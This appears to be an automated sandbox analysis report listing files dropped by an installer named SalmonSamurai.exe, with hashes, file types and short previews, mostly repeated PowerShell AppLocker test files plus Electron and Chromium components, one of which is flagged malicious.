                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vabar3kc.ydj.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vae05h5h.0dj.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5duea3l.wbo.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wnutn3lq.xcy.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wxzfrwab.4gw.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xchthmf2.jwf.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xmkiyclb.qui.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yad4cixq.p1m.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhml1yjg.qqn.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5fb3xud.20v.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdph3uqq.b43.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zjrzypug.ym3.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zt1xplrl.ehj.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zwb4ukkv.52g.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\nsw5921.tmp

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 33554432.000000, slope 35184388866048.000000
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):246294845
                                                                                                                                                                                                                                          Entropy (8bit):6.95746554896744
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:1572864:KLBZB52nvuZ7wVuMbgR7Sp6kYdEctmhoLsPagBsgkx52HYhwj+vfIBUdoJnP9Dj3:KypCmJctBjj2+JvFg+E2XdWU1Qt3
                                                                                                                                                                                                                                          MD5:42259B63C8D2B564557504B587E86073
                                                                                                                                                                                                                                          SHA1:E0B53769C0E3B0F296C9C94AC37F81800145A46B
                                                                                                                                                                                                                                          SHA-256:36485E67930FFF7A6F7E0E3156FD01817FEE62116B5E7E5257C4F2BC057CD779
                                                                                                                                                                                                                                          SHA-512:DB22AC07FB203B5009DA15D360A7F555FFD50D66C933F40E148B47FA5A986D976ACF11888D1FF2F31DB025FB94B1DE01C506F06EC142BB0A5707ED02E1C63647
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:H&......,...............................2%.......&..........................................................................4...............................................................................................................................................................G...J...........B...g.......................[.......................................j.......................[...................................................................................................................5...O.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\LICENSE.electron.txt

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1096
                                                                                                                                                                                                                                          Entropy (8bit):5.13006727705212
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:36DiJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFD:36DiJzfPvGt7ICQH+sfIte36AFD
                                                                                                                                                                                                                                          MD5:4D42118D35941E0F664DDDBD83F633C5
                                                                                                                                                                                                                                          SHA1:2B21EC5F20FE961D15F2B58EFB1368E66D202E5C
                                                                                                                                                                                                                                          SHA-256:5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
                                                                                                                                                                                                                                          SHA-512:3FFBBA2E4CD689F362378F6B0F6060571F57E228D3755BDD308283BE6CBBEF8C2E84BEB5FCF73E0C3C81CD944D01EE3FCF141733C4D8B3B0162E543E0B9F3E63
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:Copyright (c) Electron contributors.Copyright (c) 2013-2020 GitHub Inc...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISIN

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\LICENSES.chromium.html

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):8312662
                                                                                                                                                                                                                                          Entropy (8bit):4.705814170451806
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24576:dbTy6TU675kfWScRQfJw91SmfJB6i6e6R626X8HHdE/pG6:tygpj
                                                                                                                                                                                                                                          MD5:312446EDF757F7E92AAD311F625CEF2A
                                                                                                                                                                                                                                          SHA1:91102D30D5ABCFA7B6EC732E3682FB9C77279BA3
                                                                                                                                                                                                                                          SHA-256:C2656201AC86438D062673771E33E44D6D5E97670C3160E0DE1CB0BD5FBBAE9B
                                                                                                                                                                                                                                          SHA-512:DCE01F2448A49A0E6F08BBDE6570F76A87DCC81179BB51D5E2642AD033EE81AE3996800363826A65485AB79085572BBACE51409AE7102ED1A12DF65018676333
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview: Generated by licenses.py; do not edit. --><!doctype html>.<html>.<head>.<meta charset="utf-8">.<meta name="viewport" content="width=device-width">.<meta name="color-scheme" content="light dark">.<title>Credits</title>.<link rel="stylesheet" href="chrome://resources/css/text_defaults.css">.<link rel="stylesheet" href="chrome://credits/credits.css">.</head>.<body>.<span class="page-title" style="float:left;">Credits</span>.<a id="print-link" href="#" style="float:right;" hidden>Print</a>.<div style="clear:both; overflow:auto;"> Chromium <3s the following projects -->.<div class="product">.<span class="title">2-dim General Purpose FFT (Fast Fourier/Cosine/Sine Transform) Package</span>.<span class="homepage"><a href="http://www.kurims.kyoto-u.ac.jp/~ooura/fft.html">homepage</a></span>.<input type="checkbox" hidden id="0">.<label class="show" for="0" tabindex="0"></label>.<div class="licence">.<pre>Copyright(C) 1997,2001 Takuya OOURA (email: ooura@kurims.kyoto-u.ac.jp)..You may us

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):160143360
                                                                                                                                                                                                                                          Entropy (8bit):6.741790865491727
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:1572864:mLBZB52nvuZ7wVuMbgR7Sp6kYdEctmhoLsPagBsgkx52HYhwj+vfIBUdoJnP9Dj0:mypCmJctBjj2+Jv
                                                                                                                                                                                                                                          MD5:6EA18AE76085155E2681CCA92745A9AF
                                                                                                                                                                                                                                          SHA1:9EAC8A0CED4B353D3E1B17A3D844255FDCC14667
                                                                                                                                                                                                                                          SHA-256:40ABBA1E7DA7B3EAAD08A6E3BE381A9FC2AB01B59638912029BC9A4AA1E0C7A7
                                                                                                                                                                                                                                          SHA-512:757B1CA6D1BD47DE3CDAA5343E115CC4F35078FF450E99AD6DA879F7614E35D57600997D2F830777E965F901C6A61BB7888700B7547730B5C4C4C5F7A44603B0
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........."......0...8.......F.........@..........................................`...........................................+.. ..0"..h.......`....Pt.._@..........0.......!.......................!.(... Q..@...........@8......`.*......................text...:/.......0.................. ..`.rdata..h.n..@....n..4..............@..@.data....TB...1.......1.............@....pdata..._@..Pt..`@...9.............@..@.00cfg..0.............z.............@..@.gxfg...pA.......B....z.............@..@.retplne.............Dz..................rodata...... .......Fz............. ..`.tls.........@.......Xz.............@...CPADinfo8....P.......\z.............@...LZMADEC......`.......^z............. ..`_RDATA..\............pz.............@..@malloc_h+............rz............. ..`.rsrc...`............xz.............@..@.reloc......0........|.............@..B................

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\chrome_100_percent.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):127125
                                                                                                                                                                                                                                          Entropy (8bit):7.915612661029362
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:vlKzwqCT4wDNzIwL2o418Gb0+VRLf0ld0GY3cQ39Vm2I:vlKzwt4uEgK18Gb0OV8ld0GecQ3f2
                                                                                                                                                                                                                                          MD5:ACD0FA0A90B43CD1C87A55A991B4FAC3
                                                                                                                                                                                                                                          SHA1:17B84E8D24DA12501105B87452F86BFA5F9B1B3C
                                                                                                                                                                                                                                          SHA-256:CCBCA246B9A93FA8D4F01A01345E7537511C590E4A8EFD5777B1596D10923B4B
                                                                                                                                                                                                                                          SHA-512:3E4C4F31C6C7950D5B886F6A8768077331A8F880D70B905CF7F35F74BE204C63200FF4A88FA236ABCCC72EC0FC102C14F50DD277A30F814F35ADFE5A7AE3B774
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:..............t...#.....:.I...J~p...K~6...L~....M~#...N~....O~`...P~m...Q~....R~....S~I...T~....U~'"..V~.,..^~.7.._~;9..b~v:..c~(<..j~.<..k~.B..l~fH..m~.J..n~.K..o~.L.....M.....N....aP....IS....BV....uY.....]....Pa.....d....h....i...hk....l....m...An....n.....................................K.....x...........4.....m.....D.............................1........................'.....*.....4.....>.....C.....D....hM.....U.....V....>X.....Z....E].....]....a...%c....d....f....h....i....k....l....o...wq....t...7v....y....}....~...m................................3.................g.....6............................k.....-...........3.....9......................H.......................Y.................{.....s....M..............F...................&....y..............\....p....Z.........Z.........g...........................T..................6...............M.................r...........1.................X.................u.......

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\chrome_200_percent.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):177406
                                                                                                                                                                                                                                          Entropy (8bit):7.939611912805236
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:4DQYaEQN6AJPKNzIwafR54x5GMR+F44ffbdZnYw9p4AbIVGYoDd+HxNK/rIM0:4DQYaNN68QEVgx5GMRejnbdZnVE6YopY
                                                                                                                                                                                                                                          MD5:4610337E3332B7E65B73A6EA738B47DF
